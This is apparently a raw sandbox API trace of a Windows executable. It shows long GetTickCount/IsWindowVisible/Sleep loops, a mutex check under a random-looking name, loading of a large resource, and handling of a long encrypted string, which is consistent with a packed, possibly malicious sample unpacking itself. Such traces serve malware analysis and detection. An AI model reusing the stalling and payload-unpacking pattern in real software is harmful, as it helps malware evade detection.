[0197.763] GetTickCount () returned 0x371a6 [0197.763] GetTickCount () returned 0x371a6 [0197.763] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.763] Sleep (dwMilliseconds=0x0) [0197.809] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.810] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.810] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.810] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161a55 [0197.810] GetTickCount () returned 0x371d5 [0197.810] GetLastError () returned 0x578 [0197.810] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.810] GetCurrentProcessId () returned 0xa38 [0197.810] CoFreeUnusedLibraries () [0197.810] GetTickCount () returned 0x371d5 [0197.810] GetTickCount () returned 0x371d5 [0197.811] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.811] Sleep (dwMilliseconds=0x0) [0197.903] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0197.903] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0197.903] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0197.903] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161ab2 [0197.903] GetTickCount () returned 0x37232 [0197.903] GetLastError () returned 0x578 [0197.903] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0197.903] GetCurrentProcessId () returned 0xa38 [0197.904] CoFreeUnusedLibraries () [0197.904] GetTickCount () returned 0x37232 [0197.904] GetTickCount () returned 0x37232 [0197.904] IsWindowVisible (hWnd=0x7028c) returned 0 [0197.904] Sleep (dwMilliseconds=0x0) [0198.183] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0198.184] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0198.184] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0198.184] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161bcb [0198.184] GetTickCount () returned 0x3734b [0198.184] GetLastError () returned 0x578 [0198.184] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.184] GetCurrentProcessId () returned 0xa38 [0198.185] CoFreeUnusedLibraries () [0198.185] GetTickCount () returned 0x3734b [0198.185] GetTickCount () returned 0x3734b [0198.185] IsWindowVisible (hWnd=0x7028c) returned 0 [0198.185] Sleep (dwMilliseconds=0x0) [0198.324] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0198.324] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0198.325] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0198.325] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161c57 [0198.325] GetTickCount () returned 0x373d7 [0198.325] GetLastError () returned 0x578 [0198.325] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.325] GetCurrentProcessId () returned 0xa38 [0198.325] CoFreeUnusedLibraries () [0198.325] GetTickCount () returned 0x373d7 [0198.325] GetTickCount () returned 0x373d7 [0198.325] IsWindowVisible (hWnd=0x7028c) returned 0 [0198.325] Sleep (dwMilliseconds=0x0) [0198.370] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0198.371] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0198.371] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0198.371] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161c86 [0198.371] GetTickCount () returned 0x37406 [0198.371] GetLastError () returned 0x578 [0198.371] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.371] GetCurrentProcessId () returned 0xa38 [0198.371] CoFreeUnusedLibraries () [0198.371] GetTickCount () returned 0x37406 [0198.371] GetTickCount () returned 0x37406 [0198.371] IsWindowVisible (hWnd=0x7028c) returned 0 [0198.371] Sleep (dwMilliseconds=0x0) [0198.417] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0198.418] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0198.418] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0198.418] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161cb5 [0198.418] GetTickCount () returned 0x37435 [0198.418] GetLastError () returned 0x578 [0198.418] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.418] GetCurrentProcessId () returned 0xa38 [0198.418] CoFreeUnusedLibraries () [0198.418] GetTickCount () returned 0x37435 [0198.418] GetTickCount () returned 0x37435 [0198.418] IsWindowVisible (hWnd=0x7028c) returned 0 [0198.419] Sleep (dwMilliseconds=0x0) [0198.464] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0198.464] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0198.465] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0198.465] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161ce4 [0198.465] GetTickCount () returned 0x37464 [0198.465] GetLastError () returned 0x578 [0198.465] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.465] GetCurrentProcessId () returned 0xa38 [0198.465] CoFreeUnusedLibraries () [0198.465] GetTickCount () returned 0x37464 [0198.465] GetTickCount () returned 0x37464 [0198.465] IsWindowVisible (hWnd=0x7028c) returned 0 [0198.465] Sleep (dwMilliseconds=0x0) [0198.511] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0198.512] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0198.512] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0198.512] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161d13 [0198.512] GetTickCount () returned 0x37493 [0198.512] GetLastError () returned 0x578 [0198.512] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.512] GetCurrentProcessId () returned 0xa38 [0198.512] CoFreeUnusedLibraries () [0198.512] GetTickCount () returned 0x37493 [0198.513] GetTickCount () returned 0x37493 [0198.513] IsWindowVisible (hWnd=0x7028c) returned 0 [0198.513] Sleep (dwMilliseconds=0x0) [0198.558] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0198.558] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0198.559] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0198.559] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161d41 [0198.559] GetTickCount () returned 0x374c1 [0198.559] GetLastError () returned 0x578 [0198.559] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.559] GetCurrentProcessId () returned 0xa38 [0198.559] CoFreeUnusedLibraries () [0198.559] GetTickCount () returned 0x374c1 [0198.559] GetTickCount () returned 0x374c1 [0198.559] IsWindowVisible (hWnd=0x7028c) returned 0 [0198.559] Sleep (dwMilliseconds=0x0) [0198.604] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0198.605] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0198.605] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0198.605] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161d70 [0198.605] GetTickCount () returned 0x374f0 [0198.605] GetLastError () returned 0x578 [0198.605] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.605] GetCurrentProcessId () returned 0xa38 [0198.605] CoFreeUnusedLibraries () [0198.605] GetTickCount () returned 0x374f0 [0198.605] GetTickCount () returned 0x374f0 [0198.606] IsWindowVisible (hWnd=0x7028c) returned 0 [0198.606] Sleep (dwMilliseconds=0x0) [0198.651] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0198.652] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0198.652] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0198.652] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161d9f [0198.652] GetTickCount () returned 0x3751f [0198.652] GetLastError () returned 0x578 [0198.652] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.652] GetCurrentProcessId () returned 0xa38 [0198.652] CoFreeUnusedLibraries () [0198.652] GetTickCount () returned 0x3751f [0198.652] GetTickCount () returned 0x3751f [0198.652] IsWindowVisible (hWnd=0x7028c) returned 0 [0198.652] Sleep (dwMilliseconds=0x0) [0198.698] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0198.698] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0198.698] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0198.698] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161dce [0198.698] GetTickCount () returned 0x3754e [0198.699] GetLastError () returned 0x578 [0198.699] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.699] GetCurrentProcessId () returned 0xa38 [0198.699] CoFreeUnusedLibraries () [0198.699] GetTickCount () returned 0x3754e [0198.699] GetTickCount () returned 0x3754e [0198.699] IsWindowVisible (hWnd=0x7028c) returned 0 [0198.699] Sleep (dwMilliseconds=0x0) [0198.745] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0198.745] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0198.745] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0198.745] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161dfd [0198.745] GetTickCount () returned 0x3757d [0198.745] GetLastError () returned 0x578 [0198.746] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.746] GetCurrentProcessId () returned 0xa38 [0198.746] CoFreeUnusedLibraries () [0198.746] GetTickCount () returned 0x3757d [0198.746] GetTickCount () returned 0x3757d [0198.746] IsWindowVisible (hWnd=0x7028c) returned 0 [0198.746] Sleep (dwMilliseconds=0x0) [0198.792] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0198.793] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0198.793] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0198.793] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161e2b [0198.793] GetTickCount () returned 0x375ab [0198.793] GetLastError () returned 0x578 [0198.793] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.793] GetCurrentProcessId () returned 0xa38 [0198.794] CoFreeUnusedLibraries () [0198.794] GetTickCount () returned 0x375ab [0198.794] GetTickCount () returned 0x375ab [0198.794] IsWindowVisible (hWnd=0x7028c) returned 0 [0198.794] Sleep (dwMilliseconds=0x0) [0198.838] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0198.839] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0198.839] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0198.839] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161e5a [0198.839] GetTickCount () returned 0x375da [0198.839] GetLastError () returned 0x578 [0198.840] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.840] GetCurrentProcessId () returned 0xa38 [0198.840] CoFreeUnusedLibraries () [0198.840] GetTickCount () returned 0x375da [0198.840] GetTickCount () returned 0x375da [0198.840] IsWindowVisible (hWnd=0x7028c) returned 0 [0198.840] Sleep (dwMilliseconds=0x0) [0198.886] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0198.887] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0198.887] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0198.887] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161e89 [0198.887] GetTickCount () returned 0x37609 [0198.887] GetLastError () returned 0x578 [0198.887] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.887] GetCurrentProcessId () returned 0xa38 [0198.887] CoFreeUnusedLibraries () [0198.888] GetTickCount () returned 0x37609 [0198.888] GetTickCount () returned 0x37609 [0198.888] IsWindowVisible (hWnd=0x7028c) returned 0 [0198.888] Sleep (dwMilliseconds=0x0) [0198.932] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0198.933] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0198.933] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0198.933] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161eb8 [0198.933] GetTickCount () returned 0x37638 [0198.933] GetLastError () returned 0x578 [0198.933] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.934] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f0 | out: ppsaOut=0x18f8f0) returned 0x0 [0198.934] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7dc | out: ppsaOut=0x18f7dc) returned 0x0 [0198.934] SafeArrayDestroyDescriptor (psa=0x68e810) returned 0x0 [0198.934] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7dc | out: ppsaOut=0x18f7dc) returned 0x0 [0198.934] SafeArrayDestroyDescriptor (psa=0x68e810) returned 0x0 [0198.934] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7dc | out: ppsaOut=0x18f7dc) returned 0x0 [0198.934] SafeArrayDestroyDescriptor (psa=0x68e810) returned 0x0 [0198.934] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7dc | out: ppsaOut=0x18f7dc) returned 0x0 [0198.935] SafeArrayDestroyDescriptor (psa=0x68e810) returned 0x0 [0198.935] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0198.935] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441") returned 0x0 [0198.935] GetLastError () returned 0x2 [0198.935] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0198.935] GetUserDefaultLCID () returned 0x409 [0198.935] FindResourceExA (hModule=0x400000, lpType=0xa, lpName=0x29a, wLanguage=0x409) returned 0x0 [0198.935] FindResourceA (hModule=0x400000, lpName=0x29a, lpType=0xa) returned 0x4080f8 [0198.935] LoadResource (hModule=0x400000, hResInfo=0x4080f8) returned 0x408f28 [0198.935] SizeofResource (hModule=0x400000, hResInfo=0x4080f8) returned 0x22108 [0198.935] LockResource (hResData=0x408f28) returned 0x408f28 [0198.935] SafeArrayAccessData (in: psa=0x5e3118, ppvData=0x18f948 | out: ppvData=0x18f948) returned 0x0 [0198.935] SafeArrayUnaccessData (psa=0x5e3118) returned 0x0 [0198.935] SafeArrayCopy (in: psa=0x5e3118, ppsaOut=0x18f9c8 | out: ppsaOut=0x18f9c8) returned 0x0 [0198.938] SafeArrayDestroyDescriptor (psa=0x606308) returned 0x0 [0198.938] GetUserDefaultLCID () returned 0x409 [0198.938] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18f964, cchData=6 | out: lpLCData="1252") returned 5 [0198.938] SysStringByteLen (bstr="\x87d2\x7c45\xa509\x3747\x462d\xd634\x2d37\xce64\x33a6\xfa2d\x7134\x2c1e\x755b\xa53\x34f\x30f2\x3a26\x312b\x3bf3\x8545\xf85a\x8c66\x472d\x9978\x7912\x583c\x332a\x320d\x2646\x5f54\x582a\x1257\x5235\x5e2c\x4039\x3114\x502b\x4365\x5b26\x5d67\x282d\x1014\x7e7c\x5c74\xb336\x2749\x441a\x273e\x316f\x32e7\xd29f\xeb45\xb4db\xb95d\x3008\x8a46\x51f5\xb8cf\x492d\x6c66\x4e5a\x303c\x374a\x440b\x1932\x2d76\x354b\x331b\x3355\xf772\x1852\x3462\xd55d\x3e45\x3e52\x35e7\x462b\x8434\xe433\x3244\xdf4c\x5149\x4e34\x2632\x34ab\x328a\x329b\xef49\x3756\xd635\x2448\x3644\x1c51\xb477\xc629\xb43f\xc08e\x3150\x315b\x4225\x4932\x1132\x354b\x31d2\x37d4\x3cc0\x3657\xe6d0\x3641\xd45\x3152\x3067\x2e2d\x5ee2\x2932\x30ef\x3379\x7217\x6835\x1a33\x554f\xa556\x1d73\x5536\x402e\x314d\x9946\xb18f\xb50d\xbd52\xc358\x742e\x2d33\x5154\x5777\x364c\x3455\x2532\x3579\xb055\x322b\xbb44\xb457\xf1b2\x1ba9\x4237\x5621\x3f47\x27af\x66f4\xac3e\x316f\x3895\x4bed\xd774\xb528\x604f\xf24f\x5f5f\x6b98\x161c\xf137\xb048\x7e45\x701f\x674\x4603\x1870\x2d7f\x6219\x710f\x14dd\x7f79\x2f03\x7d48\x8d5f\x4c54\xcf52\x2429\x214b\x2536\x213a\x252c\x3c78\x4212\x500b\x12cc\xe50\xc5d\x7d29\x7630\x1237\xa4f\xd53\xcc52\x347d\x3069\x350b\x3176\x357a\x316c\x3078\x4212\x6bcb\x1237\xe50\xc5d\x7d29\x7630\x1237\xa4f\xcd53\x3769\x347d\x3649\x302b\x3456\x305a\x344c\x3558\x59d2\x4b35\x3232\x2e55\x2c58\x5d2c\x5635\x3232\xca4a\x3348\x3249\x315d\x3549\x302b\x3456\x305a\x344c\x2bb8\x592c\x4b35\x3232\x2e55\x2c58\x5d2c\x5635\xd232\x3454\x3348\x3249\x315d\x3549\x302b\x3456\x305a\x2aac\x2b46\x592c\x4b35\x3232\x2e55\x2c58\x5d2c\xb635\x2c2c\x3454\x3348\x3249\x315d\x3549\x302b\x3456\x2eba\x2a52\x2b46\x592c\x4b35\x3232\x2e55\x2c58\xbd2c\x482b\x2c2c\x3454\x3348\x3249\x315d\x3549\x302b\x2ab6\x2e44\x2a52\x2b46\x592c\x4b35\x3232\x2e55\xcc58\x4332\x482b\x2c2c\x3454\x3348\x3249\x315d\x3549\x2ecb\x2a48\x2e44\x2a52\x2b46\x592c\x4b35\x3232\xce55\x3246\x4332\x482b\x2c2c\x3454\x3348\x3249\x315d\x2ba9\x2e35\x2a48\x2e44\x2a52\x2b46\x592c\x4b35\x2232\x304b\x3246\x4332\x482d\x94e5\xc76b\x6778\x3324\x3042\xafe8\x91b4\x5d3b\x957e\xe921\xc47\xf12d\xf644\x8d41\x9321\x332b\xdee7\x3b95\x5b32\x47e9\x1957\x9032\x2730\x954d\x3146\x10e9\x43e4\xee66\x46e6\x262f\x5834\x9f6a\x43f4\x92e2\xd62d\x4c46\x8cfe\x2539\x1a09\x41f5\x3078\x1758\x3f34\xd5be\x9145\xd121\x9488\xf5f\x7c6b\x5f90\x3175\x692f\x4c2d\x3100\x8f33\x7239\x902d\xaa24\xb0c0\x46f5\x5ed6\x47eb\x316a\x15ed\x49fe\x348f\x5440\xa7e5\x392b\x41fb\x4287\x837\x8c6e\xb139\x92aa\x7c56\x9189\x5524\x6a34\xb24b\x2a45\xfb3a\x46e7\x7c3e\xf034\xa841\x91ce\xec2b\x426a\x3b96\xaa25\x47e8\x4f8c\x90d6\xf430\x97df\x4046\x3649\x1765\x972d\x7935\x7d2d\x5b62\x8f33\xb826\x9205\x935f\xc9a3\x5f92\xbaa2\x40f5\x3349\x3031\xe40b\x4397\xfd14\x43e4\xe013\x9640\xf85f\x543a\xf348\x9054\x4b2b\xe334\xbe46\x2d60\x47ea\x644f\x41f4\x7237\x9556\xa146\x975b\x7137\x353f\x46d3\x9cce\x2695\x723e\x90d4\x1e2b\xe34c\xb146\x2cb3\x484b\x93b8\x9724\xa477\x3424\x5310\x47e8\x50e4\x47f0\x4247\xe54f\xce46\x8f5e\xb326\xb3f4\xdc2c\xeb5a\x9c41\x34cb\xaf55\xb4d6\x530a\x46f5\x2d64\x9461\xa237\x34d3\xb41d\x5f2a\x7c29\x5f92\xb182\x7e5c\x59ad\x7b6e\x8c31\x9ec9\x17a8\x23da\x3002\xcbfe\xd11\x37cb\xb315\x8551\x36c5\x4279\xd525\xdd38\x34d6\xb16d\xca2f\xcb61\xc531\x37c9\xb07b\x3b58\x32c0\x61ae\x39b6\xb731\x147\x37d1\xb68b\x6e2f\xd661\xfd3d\x34d6\xb129\xa2f\x4bb6\x7873\x37c9\xb03b\xb354\x32c0\xb656\x136\xb71c\x8d52\x30d1\xb653\xa228\x51b6\x7813\x3016\x71ad\xde2c\x4876\x6f87\x214a\x7002\xf357\x3100\xf662\x453f\x378b\x6419\x3411\x76d7\x462c\x51f6\xefef\xd156\x710c\x522c\x4d76\xef5b\x5149\x3315\x660e\x3400\xf6d2\x1936\x340b\x730d\xd57\x7612\x62c\x5576\x6f77\x6155\x321b\x17e9\x41f6\x6f93\x294a\x3615\x715a\xf843\x7603\x6530\x378b\xf3fd\x1151\x3505\x1331\x5576\xef0f\x2951\x319b\x79\x535\x6f66\xd94f\x3095\x717a\x9c43\x3514\x64c8\x340b\x73ed\xed52\x3505\x489\x2835\x6f66\xa955\x321b\x21\xdd35\x2c71\x6073\x3315\x715e\x2043\x3514\x7378\x5548\x7310\xe152\x3505\x840d\x702e\x2c71\x2410\x371b\x75\x5135\x2973\x523\xb240\x3316\xc0aa\xcba9\x70cb\x1d93\x3145\xb563\xc46\x44ae\x8d34\x333\x9a20\xf429\x3a0\xc9bb\x9e8a\x10f1\xf81b\xb055\x3247\x7057\x3133\x6649\x442a\x3121\x5124\x45ae\x98cb\x2d02\x3154\x1ae4\x200a\xe2eb\x6e9a\xb94b\x88bf\x5d98\xf40c\x3450\x405e\x7535\xd12b\x72f5\x8a47\xabe2\x6061\xe720\x3106\x7c63\x7180\x2fad\x3cfc\x824b\x325b\x33fc\xe322\x1fc5\x2372\x3751\x5117\x7850\x37a6\x462a\x1234\x4041\x5019\x5d30\x4a2d\x4839\x4835\x2c44\x3256\x2314\x1242\x1756\x26d4\x11b6\x3140\x7353\x4628\x7740\x7234\x2d33\x3173\x3371\x4203\x6301\xedc2\xa349\x3537\x5784\x7442\x7456\x3372\x31b6\x3045\x3173\xd0ff\x6a0\x56b4\x2d33\x3655\x3338\x43ac\x6510\x4da6\xd549\xd014\x8b54\xbcbb\x3aa8\x3036\x35cd\x25d5\xd513\xa041\x4607\x52c5\xcddf\xd152\xd0bd\x122b\xefb4\x2a39\x33a2\xd09f\x3550\xc2c3\x1850\x71bb\xc949\xd2a6\x9155\x9ab7\x40c6\x4134\x20d2\xc373\xb95f\xa271\x6d39\x39d7\x6363\xd8a8\x3942\xd27a\x3750\x37c6\xbbd5\x3105\xe901\x39a3\xe90d\x59df\xcd43\x6152\x3336\xf3a\x200c\x482a\x254a\x30c6\x3136\x71e9\x36b2\x2298\x3509\x5109\x3452\x14c4\xb71e\x3811\x6da7\x9d54\x23b9\x4bd7\x4d54\xcdcb\xf545\x7457\xde56\x5943\x1955\x305d\x1548\x4079\xb958\x1727\xa4a5\x173c\x2f33\x34d4\x25dd\x426d\x453c\xd33\x3389\x35cb\x357b\x6468\x35b6\x51a4\xad17\x31a5\x1043\x7547\x9a2d\x151a\xb133\xb14d\x3319\x6d29\x4975\x4dc7\x954a\xc7bb\x3316\x5076\x5057\x3154\xa543\x3125\x55ef\xbc47\x54f\x7434\x966b\x3115\x32e3\xfb2c\x7bca\xcd21\xd4e9\x33ed\x5754\x3143\x9e56\x4311\xc964\x2d25\x559f\x215b\x498d\x88ca\x20d3\x21d6\x33dd\x43c0\x4a5d\x2c4c\x317c\x64d7\x614\x663\x1e70\x353e\x4b0b\x30ef\x3559\x304e\x442a\x8e20\xcd03\xc109\x4d79\x222d\x893c\xc31\x9830\x3236\x53bf\xd143\x6c17\x6654\x5539\x9b7c\xd52b\x4e46\x464d\x34b5\xaf33\x3134\x7ed4\x732d\xc812\xaf14\x354a\xc07a\x9374\xa63e\x3416\x51f4\x332c\x39c5\x1d73\x745f\x4b2d\x67d0\x234f\x1c5c\xc75f\xd36d\x6d0c\x2d72\x6dc9\x30b7\xfd7e\x3002\x426\x3334\xc5c5\xf945\x75fa\x2447\x4685\x5474\xd787\x3117\xf5b5\x7206\x7918\x1d33\x2ebb\x24f\x8b57\x336f\x3866\x383c\xbaed\x3104\xbfe7\x843a\xb030\x4f04\x2df2\x2a61\x3218\x4298\x2ae8\x2cf3\x35ff\x3256\x4c72\xc048\xf852\xc1e1\x2552\x3b35\x8572\xa847\x4edd\x5454\xbcc\xcc54\x8a59\xfd2c\x5634\x3232\x2a4a\x2d56\x8257\x315d\x3457\x8e3e\x5542\xdd47\x7023\xb011\x619d\x4205\xddb7\x3a79\x256d\x1209\xde22\x7535\x35bb\x2ff\xeb56\xf7\xf456\x3104\x5fd\x45\xb62\x19d7\xe627\x4244\xddf3\x8965\x724a\x482d\x3954\xe133\x34fb\xc25b\x3317\x1842\x7664\x4d34\x74c2\x3145\x41fb\x3406\xd771\x5475\x11cf\x8121\xb24c\xb72c\x4820\x9831\xb44b\x4d55\x33e3\x3343\x34e3\x32b5\x35fc\x3544\x35e7\x9846\x6f2d\x580b\x2103\x41e8\x4765\x4e1d\x42b6\x2d83\x2fc3\x3217\x74d\x904e\x3d02\x3719\xc555\xfd45\x3563\xd475\x7fdd\x96cc\xdc3\xae4\x8f29\xf226\xb960\x9533\x353b\x24f\x3317\x468\x3466\x164\x5549\x3175\x14c7\x74c7\xca2d\x148f\x133\x3f64\x2973\x421d\x79bc\xed32\x36bb\xdddb\x7332\x8142\x1059\x81c4\x8448\x8845\x75d3\xa047\x6c3\xb034\x2d03\x45be\x3269\x7299\x9134\x2c43\x3d6b\x3278\x2b57\x5c43\x76ea\x8534\x777a\x31bd\xb313\x2537\x46ec\x5a41\x2c72\x31e1\xf23a\xf62c\x4834\x2433\x3a74\x36a7\xbeea\x2b32\x841a\x7f\xad46\x715e\x6683\x8706\x7200\x3e21\x3d35\x31a4\x72f1\x5b1